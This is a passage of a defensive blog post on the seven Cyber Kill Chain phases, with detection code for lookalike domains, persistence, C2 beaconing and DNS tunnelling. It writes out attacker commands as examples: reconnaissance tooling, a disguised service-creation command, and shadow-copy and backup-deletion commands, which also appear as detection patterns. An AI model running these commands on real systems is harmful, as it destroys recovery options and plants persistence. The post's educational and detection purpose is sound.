Cyber Kill Chain: All 7 Phases Explained with Real Attack Examples (2026)
A technical deep-dive into the Cyber Kill Chain — all 7 phases mapped with real attacker techniques, detection indicators, and defensive controls. Includes a full real-world attack walkthrough and Kill Chain vs MITRE ATT&CK comparison.
Picture a ransomware affiliate that spends 11 days inside a hospital network before anyone notices. By the time the alert fires, they have exfiltrated 250 GB of patient data, deleted every shadow copy, and staged the encryptor on 1,200 endpoints. The ransom demand runs into the millions. (That scenario is the composite walkthrough later in this post, assembled from publicly documented ransomware TTPs.)
Every step of that intrusion is predictable. Every step has a detection opportunity. And almost every one gets missed, not because the tools aren't there, but because no one has mapped the attack sequence to their defenses.
That's exactly what the Cyber Kill Chain is for.
Developed by Lockheed Martin in 2011 and based on military targeting doctrine, the Cyber Kill Chain® framework defines the 7 sequential phases every attacker must complete to achieve their objectives. The core principle is operationally powerful: disrupt any single phase and the entire attack fails.
This post covers all 7 kill chain phases with real attacker tooling, IOCs to hunt for, defensive controls at each stage, a full real-world attack walkthrough, and a practical comparison of Kill Chain vs MITRE ATT&CK.
TL;DR — Cyber Kill Chain 7 Phases
Phase 1 – Reconnaissance → Attacker gathers intelligence (OSINT, email harvesting)
Phase 2 – Weaponization → Malware + exploit combined into a deliverable payload
Phase 3 – Delivery → Payload sent via phishing, USB, watering hole
Phase 4 – Exploitation → Vulnerability triggered, code executes on victim system
Phase 5 – Installation → Backdoor / persistence mechanism installed
Phase 6 – Command & Control → C2 channel established for remote access and tasking
Phase 7 – Actions on Objectives → Exfiltration, ransomware deployment, destruction
Break the chain at any phase → attack fails. The earlier you break it, the lower the cost.
Phase 1: Reconnaissance
The attacker maps the target before sending a single packet. Passive reconnaissance (OSINT, third-party scan databases) touches nothing you control, so it generates no logs and fires no alerts; active probing (port scans, site crawling) does hit your systems, but it is buried in the constant background noise of internet-wide scanning. It is simultaneously the hardest phase to detect and the easiest to limit through attack surface management.
What attackers do:
- Email harvesting — tools like theHarvester and Hunter.io enumerate employee email addresses from public sources. These become spearphishing targets.
- Subdomain enumeration — passive DNS, certificate transparency logs (crt.sh), and tools like amass surface forgotten dev/staging environments and exposed internal services.
- LinkedIn / social media profiling — job postings reveal technology stacks and internal tooling. Employee profiles expose org hierarchy, project names, and reporting relationships — all useful for pretexting.
- Shodan / Censys — internet-wide scan databases let attackers find exposed ports, service banners, and software versions without generating a single connection log on your side.
```bash
# Attacker tooling commonly seen in this phase
theHarvester -d target.com -b all     # email, subdomain enumeration
amass enum -passive -d target.com     # passive subdomain mapping
shodan search "org:TargetCompany"     # find exposed services without touching them
```
What to watch for: You won't see this phase in your logs. The right approach is to run the same tools against your own infrastructure before the attacker does. If theHarvester returns 200 employee emails, the attacker has them too.
Defensive posture:
- Run periodic OSINT assessments against your own domain (treat it as a red team exercise)
- Assume your email address format is already known — any consistent convention (first.last@ or firstlast@) is guessable from a single public address, so don't rely on address obscurity; rely on MFA and mail authentication (SPF/DKIM/DMARC) instead
- Remove unnecessary service banners and metadata from public-facing infrastructure
- Limit what job postings reveal about internal technology stack
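An added example, not from the original post, of that OSINT self-assessment in Python: it takes the JSON that crt.sh returns for a `%.target.com` query, splits the SAN lists, folds wildcards and case, discards names that merely contain your domain (`target.com.evil-site.net`), and ranks what is left by two signals worth a look, a label that suggests non-production or sensitive infrastructure and a newest certificate that has already expired. The crt.sh response, `target.com`, the keyword list and the `today` date are constructed assumptions so the script runs offline.

```python
import json

# Constructed sample in the shape crt.sh returns for
# https://crt.sh/?q=%25.target.com&output=json (assumed hostnames, not real data)
SAMPLE_CRTSH_JSON = json.dumps([
    {"name_value": "www.target.com\ntarget.com", "not_after": "2026-05-01T00:00:00"},
    {"name_value": "*.target.com", "not_after": "2026-01-01T00:00:00"},
    {"name_value": "Staging-API.target.com", "not_after": "2024-03-01T00:00:00"},
    {"name_value": "dev.target.com\nvpn.target.com", "not_after": "2026-09-01T00:00:00"},
    {"name_value": "target.com.evil-site.net", "not_after": "2026-09-01T00:00:00"},
    {"name_value": "jenkins.target.com", "not_after": "2025-02-01T00:00:00"},
])

# Label fragments that usually mean non-production or sensitive services (assumed list)
RISK_KEYWORDS = ("dev", "staging", "test", "uat", "jenkins", "gitlab", "vpn", "admin", "old", "backup")


def extract_hostnames(crtsh_json, domain):
    """Map every hostname under `domain` to the latest not_after date seen for it."""
    domain = domain.lower()
    hosts = {}
    for entry in json.loads(crtsh_json):
        expiry = entry["not_after"][:10]               # YYYY-MM-DD sorts lexically
        for raw in entry["name_value"].split("\n"):    # one cert can list many SANs
            name = raw.strip().lower().lstrip("*.")    # "*.target.com" -> "target.com"
            if name != domain and not name.endswith("." + domain):
                continue                               # "target.com.evil-site.net" is not ours
            if expiry > hosts.get(name, ""):
                hosts[name] = expiry
    return hosts


def triage(hosts, today):
    """Attach reasons to each host and sort the most interesting ones first."""
    findings = []
    for host, expiry in hosts.items():
        reasons = []
        labels = host.split(".")
        keyword = next((kw for kw in RISK_KEYWORDS if any(kw in lbl for lbl in labels)), None)
        if keyword:
            reasons.append(f"name suggests {keyword} infrastructure")
        if expiry < today:
            reasons.append(f"newest certificate expired {expiry}")  # nobody renews it: forgotten?
        findings.append((host, reasons))
    findings.sort(key=lambda item: (-len(item[1]), item[0]))
    return findings


if __name__ == "__main__":
    found = extract_hostnames(SAMPLE_CRTSH_JSON, "target.com")
    for host, reasons in triage(found, today="2026-01-15"):
        print(f"{host:32} {'; '.join(reasons) or 'no signal'}")
```

Feed it the live response (`curl 'https://crt.sh/?q=%25.target.com&output=json'`) and compare the result with your asset inventory; anything near the top of the list that inventory does not know about is exactly what the attacker's amass run will find.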
Phase 2: Weaponization
With target intelligence in hand, the attacker builds or procures their weapon. This phase happens entirely off your network — there is no detection opportunity. Your defenses need to catch the artifact when it arrives, not when it's built.
What attackers do:
- Malicious Office documents — VBA macros embedded in legacy .doc/.xls or macro-enabled .docm/.xlsm files, executing on open. Microsoft now blocks macros in files downloaded from the internet by default, yet this remains one of the highest-volume initial access vectors because users can still be talked into unblocking the file.
- Trojanized executables — legitimate-looking binaries with embedded malware, sometimes signed with stolen code-signing certificates to pass AV checks and user scrutiny.
- Custom implant development — APT groups (APT29, Lazarus Group, APT41) develop bespoke malware per campaign to defeat signature detection. SUNBURST, the implant used in the SolarWinds supply chain attack, operated undetected for over 9 months inside government and enterprise networks.
- Ransomware-as-a-Service (RaaS) — criminal affiliates purchase pre-built payloads (LockBit 3.0, BlackCat/ALPHV, Cl0p) from darkweb markets. RaaS has commoditized sophisticated attack capability, lowering the technical bar significantly.
The attacker also selects and registers C2 infrastructure at this stage — a decision that shapes detection risk in Phase 6.
Defensive posture:
- Subscribe to threat intelligence feeds (MISP, OpenCTI, commercial TI) to surface known malware families and IOCs before delivery
- Use behavioral sandbox analysis (ANY.RUN, Cuckoo, Joe Sandbox) — hash-based detection misses custom malware entirely
- Monitor certificate transparency logs for newly registered lookalike domains targeting your brand
Phase 3: Delivery
The payload reaches the victim. This is the first genuine detection opportunity — the attacker must interact with your environment for the first time.
The three primary delivery vectors:
Phishing / Spearphishing Email
The dominant delivery method across virtually every threat actor category. Spearphishing is personalized with reconnaissance data — sender spoofed as a known contact, content referencing real internal context.
Attack scenario:
1. Attacker identifies CFO + their accountant's name via LinkedIn
2. Registers lookalike domain: acc0untant-corp.com (zero instead of O)
3. Sends fake "Invoice Q1-2026.xlsx" with embedded macro to CFO
4. CFO opens attachment → macro executes → Meterpreter session established
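The lookalike domain in step 2 and the certificate-transparency monitoring recommended under Weaponization are two sides of the same check. Here is an added example (mine, not the post's) that classifies newly observed domains against the brands you protect: it folds common homoglyphs (`0` to `o`, `rn` to `m`), then tests for TLD swaps, one-character typos and brand-plus-word combinations. The protected domains and the batch of candidate names are constructed; the registrable-label logic is deliberately naive and is flagged as such in the code.

```python
# Homoglyph substitutions commonly used in lookalike registrations; multi-character
# confusables are replaced first. "1" is folded to "l" here (it could also stand for "i").
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("cl", "d"), ("0", "o"), ("1", "l"),
              ("3", "e"), ("5", "s"), ("$", "s"), ("@", "a")]

# Assumed: the brand domains we protect, and a constructed batch of newly logged names
PROTECTED = ["accountant-corp.com", "target.com"]
CT_NEW_DOMAINS = [
    "acc0untant-corp.com",            # the scenario's zero-for-o lookalike
    "accountant-corp.net",            # same name, different TLD
    "acountant-corp.com",             # one character dropped
    "accountant-corp-invoices.com",   # brand plus a plausible word
    "target-sso.com",
    "tarqet.com",
    "www.target.com",                 # our own host, must not alert
    "example.org",                    # unrelated
]


def normalize(label):
    label = label.lower()
    for glyph, plain in HOMOGLYPHS:
        label = label.replace(glyph, plain)
    return label


def levenshtein(a, b):
    """Edit distance; inputs are short, so the O(len(a)*len(b)) table is fine."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain):
    # Assumption: the second-level label is the registrable part. Production code should
    # consult the public suffix list so that names like corp.co.uk are handled correctly.
    parts = domain.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def classify(candidate, protected):
    """Return (kind, protected_domain) if `candidate` impersonates one of ours, else None."""
    candidate = candidate.lower()
    cand = registrable_label(candidate)
    for legit in protected:
        legit = legit.lower()
        if candidate == legit or candidate.endswith("." + legit):
            return None                          # one of our own names
        base = registrable_label(legit)
        if cand == base:
            return ("tld-swap", legit)
        if normalize(cand) == normalize(base):
            return ("homoglyph", legit)
        if levenshtein(cand, base) <= 1:
            return ("typosquat", legit)
        if base in cand:
            return ("combosquat", legit)
    return None


def scan(candidates, protected):
    """Return {domain: (kind, protected_domain)} for every candidate that matches."""
    hits = {}
    for name in candidates:
        verdict = classify(name, protected)
        if verdict:
            hits[name] = verdict
    return hits


if __name__ == "__main__":
    for name, (kind, legit) in scan(CT_NEW_DOMAINS, PROTECTED).items():
        print(f"{name:32} {kind:10} impersonates {legit}")
```

Run this over the daily feed of new certificates for your brand terms and pre-register or block the hits before they appear in a CFO's inbox; a homoglyph or typosquat match with a fresh certificate is close to a confirmed pretext in preparation.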
USB / Removable Media
Physical delivery with surprisingly high success rates. FIN7's BadUSB campaigns mailed USB drives to US companies, first (2020) posing as Best Buy gift cards and later (2022, per an FBI alert) as Amazon or HHS packages aimed at defense, transportation and insurance firms. Stuxnet, one of the most sophisticated cyberweapons ever publicly analyzed, used infected USB drives to cross air-gapped networks inside Iran's Natanz enrichment facility.
Watering Hole Attack
The attacker compromises a website the target community regularly visits, injecting a drive-by download exploit. The victim navigates to a legitimate-looking site and the payload executes silently. Highly effective against specific industries where browsing patterns are predictable: security researcher blogs, defense contractor portals, industry-specific trade forums.
Defensive posture:
- Email security gateway with sandbox detonation (Proofpoint, Mimecast, Microsoft Defender for Office 365)
- URL filtering and DNS-based blocking (Cisco Umbrella, Cloudflare Gateway)
- Disable macros by default via Group Policy; enforce Attack Surface Reduction (ASR) rules
- Phishing simulation programs (KnowBe4, Proofpoint Security Awareness) — measurably reduce click rates over time
Phase 4: Exploitation
The payload executes. The attacker triggers a vulnerability — in software, OS, firmware, or human behavior — to gain an initial foothold on the target system.
Common exploitation techniques:
- User-triggered execution — victim opens attachment, clicks link, runs a downloaded file. The majority of commodity phishing campaigns rely on this; no CVE required.
- Zero-day exploits — unknown vulnerabilities with no available patch. Signature-based detection has nothing to match at the point of exploitation, though behavioral EDR can still catch what the exploit does next. High acquisition cost means these are typically reserved for nation-state operations targeting high-value individuals or critical infrastructure.
- Public-facing service exploitation — unpatched vulnerabilities in perimeter devices and enterprise software:
- CVE-2021-44228 (Log4Shell) — unauthenticated RCE in Apache Log4j, impacted millions of systems across virtually every industry
- CVE-2021-26855 (ProxyLogon) — pre-authentication SSRF in Microsoft Exchange, chained to RCE and exploited by HAFNIUM and multiple other APT groups
- CVE-2023-4966 (Citrix Bleed) — session token leakage in Citrix NetScaler ADC/Gateway, exploited as a zero-day before disclosure and mass-exploited within days of the advisory
- Post-exploitation lateral movement — after initial access, attackers pivot internally using credential theft (LSASS dumping, Kerberoasting) and credential reuse (Pass-the-Hash, Pass-the-Ticket), abused trust relationships, or misconfigured services. Strictly this happens after Installation, but it repeats the exploitation step against internal systems. Mapped under MITRE ATT&CK Lateral Movement tactic (TA0008).
Defensive posture:
- Prioritize patching using the CISA KEV (Known Exploited Vulnerabilities) catalog — not CVSS score alone
- EDR with behavioral detection (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint)
- Network segmentation and micro-segmentation to contain blast radius
- Principle of least privilege — every account should have only the access required for its function
Phase 5: Installation
Initial access achieved. Now the attacker establishes persistence — guaranteeing re-entry even if the vulnerability is patched, the system reboots, or the initial session is detected and removed.
Persistence mechanisms:
Web Shells
Malicious scripts (PHP, ASPX, JSP) planted on compromised web servers. The file extension blends with legitimate application content, making detection without FIM or behavioral monitoring extremely difficult.
```html
<!-- Web shell concept — detection awareness only, not functional -->
<!-- Typically: single-line scripts accepting OS commands via HTTP GET/POST parameters -->
<!-- Hunt for: .php files in non-standard web directories, anomalous file creation events -->
<!-- Event to monitor: Sysmon Event ID 11 (FileCreate) in web server directories -->
```
Registry Run Keys / Startup Folder
```text
# Attacker writes malicious entry to persist across reboots
# MITRE ATT&CK T1547.001
HKCU\Software\Microsoft\Windows\CurrentVersion\Run → executes per user logon
HKLM\Software\Microsoft\Windows\CurrentVersion\Run → executes for all users
# Detection: monitor registry write events (Sysmon Event ID 13)
# Tool: Autoruns (Sysinternals) to baseline and diff Run key entries
```
Windows Service Creation
```cmd
# Attacker creates a service with a legitimate-sounding name
# MITRE ATT&CK T1543.003
sc.exe create "WindowsUpdateHelper" binPath= "C:\Windows\Temp\svchost32.exe" start= auto
# Detection: Windows Event ID 7045 (new service installed)
# Hunt for: services with binaries outside System32, recently created services
```
Timestomping
Attackers modify file metadata — creation, modification, and last-access timestamps — to make malicious files appear legitimate and defeat forensic timeline analysis. MITRE ATT&CK T1070.006.
Defensive posture:
- File Integrity Monitoring (FIM) — Wazuh, OSSEC, Tripwire; alert on changes to sensitive directories
- Audit Startup folder and Run keys against a known-good baseline (Autoruns from Sysinternals)
- Alert on Windows Event ID 7045 (new service created)
- Application whitelisting via WDAC or AppLocker to block execution of unauthorized binaries
- Deploy Sysmon with a hardened config (SwiftOnSecurity or Olaf Hartong's modular config)
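An added example (not the post's own code) of the Run-key and service-creation hunts above as detection logic: it runs over constructed Sysmon Event ID 13 and System Event ID 7045 records, suppresses Run values that match an Autoruns-style known-good baseline, and raises severity when the binary lives outside trusted directories or the value was written by a living-off-the-land binary such as reg.exe. Field names follow the flattened Sysmon/System XML as common shippers emit it; the events, the baseline and the trusted-directory list are assumptions.

```python
import re

# Constructed events in the field layout that Sysmon (Event ID 13) and the System log
# (Event ID 7045) produce after a typical log shipper flattens the XML; not real telemetry.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\update.exe -s"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\Foo\DisplayName",
     "Details": "Foo"},
    {"EventID": 7045, "ServiceName": "WindowsUpdateHelper",
     "ImagePath": r"C:\Windows\Temp\svchost32.exe", "StartType": "auto start"},
    {"EventID": 7045, "ServiceName": "Sense", "StartType": "demand start",
     "ImagePath": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
]

# Known-good autoruns, as exported with Autoruns from a clean build (assumed).
# Keys and values are stored lower-cased and compared case-insensitively.
BASELINE = {
    r"hkcu\software\microsoft\windows\currentversion\run\onedrive":
        r"c:\users\alice\appdata\local\microsoft\onedrive\onedrive.exe /background",
}

RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\\[^\\]+$", re.IGNORECASE)
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                "c:\\program files\\", "c:\\program files (x86)\\")
# Installers rarely write Run keys through these; attackers and scripts usually do
LOLBIN_WRITERS = {"reg.exe", "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def binary_path(cmdline):
    """Executable path from a command line; quoted paths may contain spaces."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        return cmdline[1:cmdline.find('"', 1)].lower()
    return cmdline.split()[0].lower()


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def triage_persistence(events, baseline):
    """Alerts for Run-key writes not in the baseline and for every new service."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 13 and RUN_KEY_RE.search(ev["TargetObject"]):
            key, value = ev["TargetObject"].lower(), ev["Details"].lower()
            if baseline.get(key) == value:
                continue                                   # unchanged known-good autorun
            exe = binary_path(value)
            writer = ev["Image"].lower().rsplit("\\", 1)[-1]
            severity = "high" if not in_trusted_dir(exe) or writer in LOLBIN_WRITERS else "medium"
            alerts.append({"rule": "T1547.001 Run key set", "severity": severity,
                           "key": ev["TargetObject"], "binary": exe, "writer": writer})
        elif ev["EventID"] == 7045:
            exe = binary_path(ev["ImagePath"])
            severity = "high" if not in_trusted_dir(exe) else "low"   # low = review, not ignore
            alerts.append({"rule": "T1543.003 service installed", "severity": severity,
                           "service": ev["ServiceName"], "binary": exe, "start": ev["StartType"]})
    return alerts


if __name__ == "__main__":
    for alert in triage_persistence(SAMPLE_EVENTS, BASELINE):
        print(alert)
```

The baseline is what makes this usable: without it, every OneDrive, Teams and vendor-agent autorun is an alert, and analysts stop reading. Rebuild it from a golden image after each patch cycle rather than hand-maintaining it.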
Phase 6: Command & Control (C2)
Persistence established. The compromised host now beacons — periodically checking in with attacker-controlled infrastructure to receive commands and stage exfiltrated data. The attacker has full keyboard access to the victim machine via an encrypted, covert channel.
Modern C2 channels:
HTTPS Beaconing (Most Common)
Malicious traffic blends with legitimate HTTPS on port 443. Tools like Cobalt Strike use "malleable C2 profiles" that mimic known CDN traffic patterns (Amazon, Akamai, Microsoft) at both the TLS handshake and HTTP request layer.
Detection indicators to hunt:
- Regular, low-variance beaconing intervals (every 60s, 300s)
→ Legitimate user traffic is irregular; malware beacons like a clock
- Unusual or recently issued TLS certificates on internal hosts
- High-volume POST requests to newly registered or low-reputation domains
- Cobalt Strike defaults: the stock profile POSTs to /submit.php and presents a well-known JA3 hash; operators who ship default profiles are trivially fingerprinted
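An added example (not from the original post) of the first indicator, regular beaconing, as code: it groups constructed connection records per source/destination, computes the coefficient of variation of the inter-arrival gaps, and reports flows that are too regular to be a person while refusing to score flows with too few samples. The log format (`timestamp src dst bytes`), the addresses and the 300-second, 15%-jitter beacon are constructed to match the walkthrough later in this post.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def _conn_lines(start, src, dst, gaps, size):
    """Constructed connection records ("ts src dst bytes") built from inter-arrival gaps."""
    t, lines = start, []
    for gap in [0] + gaps:
        t += timedelta(seconds=gap)
        lines.append(f"{t.isoformat()} {src} {dst} {size}")
    return lines


START = datetime(2026, 1, 15, 9, 0, 0)
# Flow 1: 300 s sleep with about 15% jitter, constant request size (a stock beacon)
# Flow 2: a person browsing from the same host, bursty and irregular
# Flow 3: too few connections to judge; the analysis must refuse to score it
SAMPLE_LOG = (
    _conn_lines(START, "10.0.5.23", "203.0.113.7:443",
                [300, 285, 315, 330, 270, 300, 310, 290, 320, 280], 1428)
    + _conn_lines(START, "10.0.5.23", "198.51.100.10:443",
                  [5, 2, 900, 40, 1, 3600, 12, 7, 250, 30], 5210)
    + _conn_lines(START, "10.0.5.24", "203.0.113.7:443", [60, 60], 1428)
)


def parse(lines):
    """Group (timestamp, bytes) per (src, dst) flow."""
    flows = defaultdict(list)
    for line in lines:
        ts, src, dst, size = line.split()
        flows[(src, dst)].append((datetime.fromisoformat(ts), int(size)))
    return flows


def beacon_candidates(flows, min_samples=8, max_cv=0.2):
    """Flows whose inter-arrival times are too regular to be a human.

    The coefficient of variation (stdev / mean) of the gaps tolerates jitter: a
    300 s sleep with 15% jitter scores around 0.06, well under max_cv, while
    interactive traffic scores above 1. Payload-size variety is reported as a
    second signal because stock beacons send near-identical check-ins.
    """
    hits = []
    for (src, dst), records in flows.items():
        records.sort()
        if len(records) < min_samples:
            continue                                  # not enough evidence either way
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(records, records[1:])]
        mean, sd = statistics.mean(gaps), statistics.stdev(gaps)
        cv = sd / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append({"src": src, "dst": dst, "connections": len(records),
                         "mean_gap_s": round(mean), "cv": round(cv, 3),
                         "distinct_sizes": len({size for _, size in records})})
    return hits


if __name__ == "__main__":
    for hit in beacon_candidates(parse(SAMPLE_LOG)):
        print(hit)
```

Against real Zeek `conn.log` or proxy data, run this per hour over a day of traffic and allow-list the legitimate clocks (NTP, update agents, monitoring) you will find; what remains is worth a look at the destination's age and reputation.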
DNS Tunneling
Data encoded within DNS query names, resolved against an attacker-controlled authoritative DNS server. Effective because DNS is almost never blocked at the enterprise perimeter.
```text
# Detection: hunt for these DNS anomalies in your DNS logs
- Subdomain labels > 50 characters (encoded data)
- High query frequency to a single second-level domain
- Uncommon record types in responses (TXT, NULL, CNAME chains)
- Known tools: dnscat2, iodine, DNSExfiltrator, AAAA-encoded payloads
```
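The DNS indicators above, as an added example that is not part of the original post: it scores each registrable domain in a constructed query log on label length, Shannon entropy of the attacker-controlled labels, the ratio of unique names to queries, and uncommon query types, and flags a domain only when several indicators hold at once (a single long label is a normal CDN or SaaS hostname). The query log, the `exfil-example.net` domain and the thresholds are assumptions; CNAME-chain analysis needs response data, which this query-only log does not carry.

```python
import math
from collections import Counter, defaultdict

HEX = "0123456789abcdef"
# Constructed query log lines: "src qname qtype". The tunnel labels are deterministic
# high-entropy strings standing in for encoded data; exfil-example.net is an assumed domain.
BENIGN = ["10.0.5.23 www.google.com A", "10.0.5.23 outlook.office365.com A"] * 12
TUNNEL = [
    "10.0.5.23 " + "".join(HEX[(i * 7 + k * 3) % 16] for k in range(56)) + ".t.exfil-example.net TXT"
    for i in range(12)
]
SAMPLE_DNS_LOG = BENIGN + TUNNEL


def shannon_entropy(s):
    """Bits per character; random hex tops out at 4.0, English words sit near 2 to 3."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def analyze_dns(lines, long_label=50, entropy_min=3.5, uncommon=("TXT", "NULL")):
    """Per registrable domain, count the tunnelling indicators listed above."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "long": 0, "entropy": 0, "uncommon": 0})
    for line in lines:
        src, qname, qtype = line.split()
        labels = qname.lower().rstrip(".").split(".")
        # Assumption: last two labels are the registrable domain; use the public suffix list in production
        st = stats[".".join(labels[-2:])]
        st["queries"] += 1
        st["names"].add(qname)
        longest = max(labels[:-2], key=len, default="")   # only the part the attacker controls
        st["long"] += len(longest) > long_label
        st["entropy"] += len(longest) >= 20 and shannon_entropy(longest) > entropy_min
        st["uncommon"] += qtype.upper() in uncommon
    return stats


def suspicious_domains(stats, min_queries=10, min_signals=2):
    """Domains where at least `min_signals` indicators hold for most of their queries."""
    flagged = []
    for domain, st in stats.items():
        q = st["queries"]
        if q < min_queries:
            continue
        signals = [name for name, ratio in (
            ("long labels", st["long"] / q),
            ("high entropy", st["entropy"] / q),
            ("unique names", len(st["names"]) / q),
            ("uncommon qtype", st["uncommon"] / q),
        ) if ratio > 0.5]
        if len(signals) >= min_signals:
            flagged.append((domain, signals))
    flagged.sort(key=lambda item: -len(item[1]))
    return flagged


if __name__ == "__main__":
    for domain, signals in suspicious_domains(analyze_dns(SAMPLE_DNS_LOG)):
        print(f"{domain}: {', '.join(signals)}")
```

Requiring two or more signals is what keeps this quiet on real resolvers: antivirus and EDR vendors legitimately encode lookups into long, unique labels, but those hit well-known domains you can allow-list, and they rarely arrive as TXT or NULL queries at tunnelling volumes.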
Domain Fronting
C2 traffic is routed through a trusted CDN (AWS CloudFront, Azure CDN, Cloudflare) using the CDN's legitimate IP address. The TLS SNI names an innocuous site on the CDN; the true destination is specified in the encrypted Host header. Your firewall logs show a connection to Amazon. The data reaches the attacker. Caveat: Google and AWS CloudFront blocked fronting in 2018 and Azure enforced a block in 2022, so classic fronting is rarer now, but variants keep surfacing on services that still tolerate an SNI/Host mismatch, and the detection lesson stands: a connection to a major CDN IP is not automatically benign.
Defensive posture:
- Network Traffic Analysis — Zeek, Suricata, Darktrace for behavioral anomaly detection
- DNS monitoring and DGA (Domain Generation Algorithm) detection via frequency analysis
- JA3/JA3S TLS fingerprinting to identify known C2 frameworks (Cobalt Strike, Sliver, Havoc)
- Egress filtering — explicit allowlist for outbound destinations from sensitive network segments
- SSL/TLS inspection on forward proxy for non-exempted traffic categories
Phase 7: Actions on Objectives
All prior phases exist to enable this one. The attacker executes their actual mission. Objectives vary significantly by threat actor type:
| Threat Actor | Primary Objective |
|---|---|
| Ransomware group (Cl0p, LockBit) | Exfiltrate data → encrypt → double extortion |
| Nation-state APT (APT29, APT41) | Long-term espionage, IP theft, persistence |
| Hacktivist | Public disruption, defacement, data leaks |
| Insider threat | Targeted data theft, sabotage |
| Financial crime (FIN7, FIN11) | Credential theft, BEC fraud, wire transfers |
Common actions:
- Data exfiltration — sensitive files staged, compressed, and encrypted locally, then transferred over the C2 channel. In modern ransomware operations, exfiltration happens before encryption for double extortion leverage.
- Privilege escalation — moving from standard user to Domain Admin. Common techniques: Kerberoasting, Pass-the-Hash, DCSync, token impersonation, exploiting misconfigured sudo or delegation.
- Shadow Copy deletion — near-universal first step in ransomware deployment. Eliminates Windows recovery options.
```cmd
# Consistently observed in ransomware incidents prior to encryption
vssadmin delete shadows /all /quiet           # delete volume shadow copies
wbadmin delete catalog -quiet                 # destroy Windows Server backup catalog
bcdedit /set {default} recoveryenabled No     # disable recovery mode
```
- Lateral movement to high-value targets — domain controllers, backup infrastructure, finance systems, and certificate authorities are primary pivot targets.
- Destructive attacks — nation-state wipers (HermeticWiper used in Ukraine 2022, NotPetya 2017) overwrite the MBR and file contents. Designed to destroy evidence or cause maximum operational impact rather than financial gain.
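The three shadow-copy and recovery commands shown above, turned into detection logic as an added example (mine, not the post's): it normalizes constructed Sysmon Event ID 1 command lines (quotes stripped, whitespace collapsed, case ignored), matches the vssadmin, wmic, WMI-via-PowerShell, wbadmin and bcdedit forms of ATT&CK T1490, ignores the legitimate `vssadmin list shadows` and `wbadmin start backup` a backup agent runs, and escalates when the same precursor fires on several hosts at once, which is what a PsExec fan-out looks like. Hosts, parent images and the backup-agent path are assumptions.

```python
import re

# Constructed Sysmon Event ID 1 (process creation) records; hosts and paths are assumed.
SAMPLE_PROCESS_EVENTS = [
    {"host": "WS-0412", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin  delete shadows /all /quiet"},
    {"host": "WS-0412", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wbadmin delete catalog -quiet"},
    {"host": "WS-0412", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "bcdedit /set {default} recoveryenabled No"},
    {"host": "SRV-BK01", "ParentImage": r"C:\Program Files\BackupSuite\agent.exe",
     "CommandLine": r'"C:\Windows\System32\vssadmin.exe" list shadows'},
    {"host": "SRV-BK01", "ParentImage": r"C:\Program Files\BackupSuite\agent.exe",
     "CommandLine": "wbadmin start backup -backupTarget:E: -include:C: -quiet"},
    {"host": "WS-0187", "ParentImage": r"C:\Windows\Temp\svchost32.exe",
     "CommandLine": "powershell -nop -c Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"},
    {"host": "WS-0203", "ParentImage": r"C:\Windows\PSEXESVC.exe",
     "CommandLine": "wmic shadowcopy delete"},
]

# Each pattern is applied to a normalized command line (quotes stripped, whitespace collapsed)
PRECURSOR_RULES = [
    ("T1490 shadow copies deleted (vssadmin)",
     re.compile(r"\bvssadmin(\.exe)? delete shadows\b", re.I)),
    ("T1490 shadow storage shrunk (evicts copies)",
     re.compile(r"\bvssadmin(\.exe)? resize shadowstorage\b", re.I)),
    ("T1490 shadow copies deleted (wmic)",
     re.compile(r"\bwmic(\.exe)? shadowcopy delete\b", re.I)),
    ("T1490 shadow copies deleted (WMI via PowerShell)",
     re.compile(r"win32_shadowcopy.*\b(delete|remove)", re.I)),
    ("T1490 backup catalog deleted",
     re.compile(r"\bwbadmin(\.exe)? delete (catalog|systemstatebackup)\b", re.I)),
    ("T1490 Windows recovery disabled",
     re.compile(r"\bbcdedit(\.exe)? /set \{default\} (recoveryenabled no|bootstatuspolicy ignoreallfailures)\b", re.I)),
]


def normalize_cmdline(cmd):
    """Strip quotes and collapse whitespace so spacing and quoting tricks don't dodge the rules."""
    return " ".join(cmd.replace('"', "").split())


def detect_precursors(events):
    """One alert per event that matches any T1490 precursor rule."""
    alerts = []
    for ev in events:
        cmd = normalize_cmdline(ev["CommandLine"])
        for rule, pattern in PRECURSOR_RULES:
            if pattern.search(cmd):
                alerts.append({"host": ev["host"], "rule": rule, "parent": ev["ParentImage"], "cmd": cmd})
                break
    return alerts


def impacted_hosts(alerts):
    return {a["host"] for a in alerts}


def fleet_wide(alerts, host_threshold=3):
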